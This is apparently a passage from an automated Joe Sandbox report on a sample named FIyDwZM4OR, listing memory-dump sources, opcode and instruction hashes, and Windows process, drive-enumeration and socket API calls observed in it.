                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 31fd42b44e0bc56614ccbaf7a188a52a3f107778c70daadda7987f749a51a189
                                                              • Instruction ID: f5619cbdfb0e7c50af1a4ed7fa4e75daf4400c06f17c61a38c1dd5d072c4f00c
                                                              • Opcode Fuzzy Hash: 31fd42b44e0bc56614ccbaf7a188a52a3f107778c70daadda7987f749a51a189
                                                              • Instruction Fuzzy Hash: 713186FB2AD129BD719AA1419F549F6662EE7CF330B358426B803D66C2E3C44E4D5831
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 6b84db70e296f06aca77e796f031ec79e40f54acf3506946a6e75fbf42239ab0
                                                              • Instruction ID: bb42dd41d74258d96321c96ab6ebef46ba8f38fbe2b19bd7c8dcf30d488e41e8
                                                              • Opcode Fuzzy Hash: 6b84db70e296f06aca77e796f031ec79e40f54acf3506946a6e75fbf42239ab0
                                                              • Instruction Fuzzy Hash: DC21C7F72AD118BDA29BA1419B546F6672EE7CB230F358076B803D66C2E3C40B4D5931
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 7ffce72cbe27f1fe26f16b3abad05f46375b5b9759be7dc7574742d2e133b90f
                                                              • Instruction ID: 0c26bdc74699a1950b276068c5930ac2821ea54862db6f54886f1cc9300c6f1b
                                                              • Opcode Fuzzy Hash: 7ffce72cbe27f1fe26f16b3abad05f46375b5b9759be7dc7574742d2e133b90f
                                                              • Instruction Fuzzy Hash: 482195F72AD119BDB29AA1456B50AFA662DD7CB230F358026B803D66C2E3C40A4D5831
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: fd7e9d1204111881ff8c28f9c2e590e920cedfb8c4fb849c3b9d40f087a9cbf9
                                                              • Instruction ID: 472f3f96261899071824522b07ef1e187b915488f205ce15cd168eaff386981b
                                                              • Opcode Fuzzy Hash: fd7e9d1204111881ff8c28f9c2e590e920cedfb8c4fb849c3b9d40f087a9cbf9
                                                              • Instruction Fuzzy Hash: B32184F62AD119BEB29AA1455F54ABA662DE7CB230F358036B803D66C2E3D40A4D1871
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 1b8632674b1b636ec42e3962d7d7bb6cb05996444ea32aad66ed2ab2269610b4
                                                              • Instruction ID: 3bc8eab31809cb1527d02b39e55d8b6f524ae5fbc501889427f7f258c67b99e9
                                                              • Opcode Fuzzy Hash: 1b8632674b1b636ec42e3962d7d7bb6cb05996444ea32aad66ed2ab2269610b4
                                                              • Instruction Fuzzy Hash: 952146F619D0147DA24791415F009F67B2DE7CB6307398466F842DB4C3E3C40E4E1571
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 7a9366e278b765ddc1bfba6f7b3bd4a09e53085da9b4eaf6e0d2fcf216da7860
                                                              • Instruction ID: 7cdd9520181289e8910e2969dd8974fe2073c18e56df2f89e107549a4348b176
                                                              • Opcode Fuzzy Hash: 7a9366e278b765ddc1bfba6f7b3bd4a09e53085da9b4eaf6e0d2fcf216da7860
                                                              • Instruction Fuzzy Hash: ED11D6FA29D119BE729AA1415F50AFA662DD7CF730B36806AF803D75C2E3C40E4E1831
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 40ea675f4b61bb987d361be100f085bd2ec8f5d86b9a00a34460bf7dd23dbd36
                                                              • Instruction ID: e6aa03a7040e240c0ea76571dacb833b7e5d969ce0d1a8de4002db15cc3110d7
                                                              • Opcode Fuzzy Hash: 40ea675f4b61bb987d361be100f085bd2ec8f5d86b9a00a34460bf7dd23dbd36
                                                              • Instruction Fuzzy Hash: 8311F0FA19E114BEA24792415F109F67B2DE7CB630B398466F842E75C3E3C40A4E5572
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 762150938e2717a9b38fd7591dabc5dee31bcd24988c54962cf4c6f06a87e5a5
                                                              • Instruction ID: 15857b0f42ebfab46de94001cf081f2bbb5c106c54612af25e05e0f943cf6efa
                                                              • Opcode Fuzzy Hash: 762150938e2717a9b38fd7591dabc5dee31bcd24988c54962cf4c6f06a87e5a5
                                                              • Instruction Fuzzy Hash: 8511C6FB2AD029BD719AA1415F50AFA662DD3CF730B358426F843D66C2E3C40E4E1971
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 31b9a9254b98895710fffbdb8da465f7a6ee40b8f06cee5c6110b7686408e929
                                                              • Instruction ID: f505d824d8576cea476ffa2a930c14523525ae18b30c2ffcd9d60cca33cdd869
                                                              • Opcode Fuzzy Hash: 31b9a9254b98895710fffbdb8da465f7a6ee40b8f06cee5c6110b7686408e929
                                                              • Instruction Fuzzy Hash: D11161FB29D025BD7186A181AF14AFA662DE3CB630735C426F843D6892E3C44E4E1871
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: dbde8efbf7e88b3e1f7144f9be457a1f271b5eefc0702159b13e3a855c3da50b
                                                              • Instruction ID: 79ce2457ea3f9c77558261c697ff1efe041f2891db8dfb7f9005e67b8ca07240
                                                              • Opcode Fuzzy Hash: dbde8efbf7e88b3e1f7144f9be457a1f271b5eefc0702159b13e3a855c3da50b
                                                              • Instruction Fuzzy Hash: 6D11E3EA11D250AFF20682916F14BFBABAED6CB730B35843BB447D2186D3980E495131
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: f6f63df57e493ab2fe5cbf2ea701e3ca73570da868f05378799c4f2e0d829eb7
                                                              • Instruction ID: 11405573da6b605a5791c1fbba1a6a5e6ecdd79b97758cdd1808e4a847e55a4f
                                                              • Opcode Fuzzy Hash: f6f63df57e493ab2fe5cbf2ea701e3ca73570da868f05378799c4f2e0d829eb7
                                                              • Instruction Fuzzy Hash: BA0152FB29D0157C7186A1815F18EFA662DD6CB630B36C426F843D6892E3C44E4E1471
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 1d94275d6c0c0f41aa3510c22c0cbae87b5e8056fe7cbb95edc4a9abdce0b850
                                                              • Instruction ID: 31bc04cdc3e0eb0602aa9296b2ec789f6e72e273d974a021531045fce1d32a9f
                                                              • Opcode Fuzzy Hash: 1d94275d6c0c0f41aa3510c22c0cbae87b5e8056fe7cbb95edc4a9abdce0b850
                                                              • Instruction Fuzzy Hash: 8E1199FB6092506EF706816066856FA7BAEF7CB330B31887AE441C6842E3484E0B4272
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: ae3985e174cf0a902a6d9fe3ad41115b4adbe793c6649b6eecfc3c375748983d
                                                              • Instruction ID: 1365478bf2102d14b4dbc5cf4217443f972c289fbdb4441fd9989f973a6278ec
                                                              • Opcode Fuzzy Hash: ae3985e174cf0a902a6d9fe3ad41115b4adbe793c6649b6eecfc3c375748983d
                                                              • Instruction Fuzzy Hash: 3D014CFB2DD025BC718AA1816F14ABA662DD3CB730B358426F843D6982E3C40E4E1472
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 78863f4bae2db4f6d2e122ee59dbffe845fa0a0edf985d89b1539960af41b70e
                                                              • Instruction ID: e1df8a0a0d3b854afd6e392640b2730fb1aea5823a7a1cbbdcbdb1133bdf245c
                                                              • Opcode Fuzzy Hash: 78863f4bae2db4f6d2e122ee59dbffe845fa0a0edf985d89b1539960af41b70e
                                                              • Instruction Fuzzy Hash: 2701F7FB21C210AFF20685516B106FA6BEFE7CF730B314436B046D2582D7A84A0A0135
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 84bd76b2b52c58d1980d2e826377f9b1e8b63025b31b0020e57d6b14d53e683f
                                                              • Instruction ID: 8778c4be8833ad97c1f0ada6b717e662376798d74c8c01dfaa38654b9aafec87
                                                              • Opcode Fuzzy Hash: 84bd76b2b52c58d1980d2e826377f9b1e8b63025b31b0020e57d6b14d53e683f
                                                              • Instruction Fuzzy Hash: DCF024FB2582107EF206C5516B14BFA6BAFE7CB730B31843AF507D1581E7984E4A0131
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 98d070307b53b69a5a6d493d42fa9f31e313557b1e1d8091a0b0e63f761c3932
                                                              • Instruction ID: dcf8effdd6e0a8d208e568c4e0dee107083909daadcd855eec4e639491c1af65
                                                              • Opcode Fuzzy Hash: 98d070307b53b69a5a6d493d42fa9f31e313557b1e1d8091a0b0e63f761c3932
                                                              • Instruction Fuzzy Hash: 22F096EB258210AEB10585416B447FA56AFE6CF730B318436B507D1582D7984E091135
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 45edf5fa0e54581e5ede4e24b99ba1722abd86e0995b910b1afffb464df1abfb
                                                              • Instruction ID: 0a7d70ff6371be7f0a8ac0a9201ed6e5e03ab48a0096260d78f2a9d1869b40d6
                                                              • Opcode Fuzzy Hash: 45edf5fa0e54581e5ede4e24b99ba1722abd86e0995b910b1afffb464df1abfb
                                                              • Instruction Fuzzy Hash: 50F0B4EB25C2106EF20985812B14BFAAAAFE7CF330B31843AB507D1586D7984F091135
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00F5AFD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 73f42b3fb9e5eabb0689a19dbafb1f35fa9da4b9ada6e084597928aa80626dab
                                                              • Instruction ID: aee956c41de0d89dcb482b155e31bec66398bd0460c452fee7be5ace4d972656
                                                              • Opcode Fuzzy Hash: 73f42b3fb9e5eabb0689a19dbafb1f35fa9da4b9ada6e084597928aa80626dab
                                                              • Instruction Fuzzy Hash: D811967080878595EB268F18D8027E6B3F4EFD0329F109618EAD942150F7329ACA9BD2
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 3a69cc483f498e85c5481f4fee25263a58d45e87b61814eeff1832ff7d0f893a
                                                              • Instruction ID: d5da7c7a6ea4833d0cf3d727f870dd58b71e9d5c0c4688b55f775533bd9456e1
                                                              • Opcode Fuzzy Hash: 3a69cc483f498e85c5481f4fee25263a58d45e87b61814eeff1832ff7d0f893a
                                                              • Instruction Fuzzy Hash: D0F059FA2583106EE20685106B507F66BEFE7CB330F30443AF046E2581D7E84A0A0134
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00F5A97E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: 6ca636461655859167458b6fe65ebaeb43227b85bc701155f777a78322d21edc
                                                              • Instruction ID: af37b8f00864f542b02069895c7274ab4f994ffcdfc79022006a67fe5180770b
                                                              • Opcode Fuzzy Hash: 6ca636461655859167458b6fe65ebaeb43227b85bc701155f777a78322d21edc
                                                              • Instruction Fuzzy Hash: AF01A272B01710AFC6148F24DC45B5AB7A5EF84721F068659EA982B361C331AC149BE2
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00F4712E,?,?,?,00001001,00000000), ref: 00F5A90C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: e91b0b94a7d3001797bc5aaf6e32edd70a01b0ec39b74327df967a5e9b459bd7
                                                              • Instruction ID: ffaa54cc73857cd977b2af66ffce06c12a0f729d9f925bb1ee6131861065aa99
                                                              • Opcode Fuzzy Hash: e91b0b94a7d3001797bc5aaf6e32edd70a01b0ec39b74327df967a5e9b459bd7
                                                              • Instruction Fuzzy Hash: 64F06D75109318AFD2209E01DC44D6BBBEDFFC9764F05466DFD48232118270AE24DAB2
                                                              APIs
                                                              • socket.WS2_32(?,00F5B280,00000000,-00000001,00000000,00F5B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00F5AF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: 2003cfcf0e13aa9e81f06402403658ba86ca21df21458379ac016159f4c5cdfc
                                                              • Instruction ID: b225f9b34f63adbc59ba0a63addfedba65a003727f383676dd65aff3f8a897b8
                                                              • Opcode Fuzzy Hash: 2003cfcf0e13aa9e81f06402403658ba86ca21df21458379ac016159f4c5cdfc
                                                              • Instruction Fuzzy Hash: 66E0EDB6A092216BD654DE18E8449ABF3ADEFC4B21F055A49BD5467204C330AC5487E2
                                                              APIs
                                                              • closesocket.WS2_32(?,00F59422,?,?,?,?,?,?,?,?,?,?,?,00F43377,01324C60,00000000), ref: 00F5B04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: d935019488c59b00ed1ef855b6f8c3b8e3d26d9854d4645e0c7d9e9b8776011e
                                                              • Instruction ID: 58395796375bff63f4df19a80992cfe962ef08b03c10f37b289aec97e08890c7
                                                              • Opcode Fuzzy Hash: d935019488c59b00ed1ef855b6f8c3b8e3d26d9854d4645e0c7d9e9b8776011e
                                                              • Instruction Fuzzy Hash: 92D0C234B0020157CA209B14C884A57732B7FC0321FA8CB68E92C4A1D0D73BCC4B9601
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,00ECAF56,?,00000001), ref: 00EF67FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: deaf4c5b4468baab1596e476b21a2a62d3243122072c2ec1b441c7f043b79e35
                                                              • Instruction ID: b1655764e4dcdbc3f01eeb42c5cdaf68e392172bccfb74209a509df258ccb336
                                                              • Opcode Fuzzy Hash: deaf4c5b4468baab1596e476b21a2a62d3243122072c2ec1b441c7f043b79e35
                                                              • Instruction Fuzzy Hash: 9DC080F121C101BFD70C8714D455B2F77E8DB84355F01581CB086D1180FA345990CF17
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: c5d3725f3477da8cf67be10061151600355af963a8bfc2c3f84c06f3c5c7e505
                                                              • Instruction ID: e751b347dd9a662a1a5a02545cc117765885633a7650e9840522e635c51d768a
                                                              • Opcode Fuzzy Hash: c5d3725f3477da8cf67be10061151600355af963a8bfc2c3f84c06f3c5c7e505
                                                              • Instruction Fuzzy Hash: C0C04CE0C1464546DB44BA38858611D79E47B45104FD11A68998496195F768D3188697
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799809102.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ecc902ab18d8b3019e897f7c2172f512e4a3045182dd9c2d96f5deae436241b
                                                              • Instruction ID: cfc3e00f12fbd348746705f669212634e52e5c591a39de0f923ee493b239175b
                                                              • Opcode Fuzzy Hash: 0ecc902ab18d8b3019e897f7c2172f512e4a3045182dd9c2d96f5deae436241b
                                                              • Instruction Fuzzy Hash: 85C19EFB96C214BDB20AC5816B54AFA677DE7CB730F32843AF407D9582D3A80AC95531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799809102.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f0396371f681c26ced663e608f480446bd2b515d0ab2d3243b6d2c4d3191844
                                                              • Instruction ID: b31da468f9eeaa9bb78b36eb946bbe2998acf75201a5b884551375dc53f43dc1
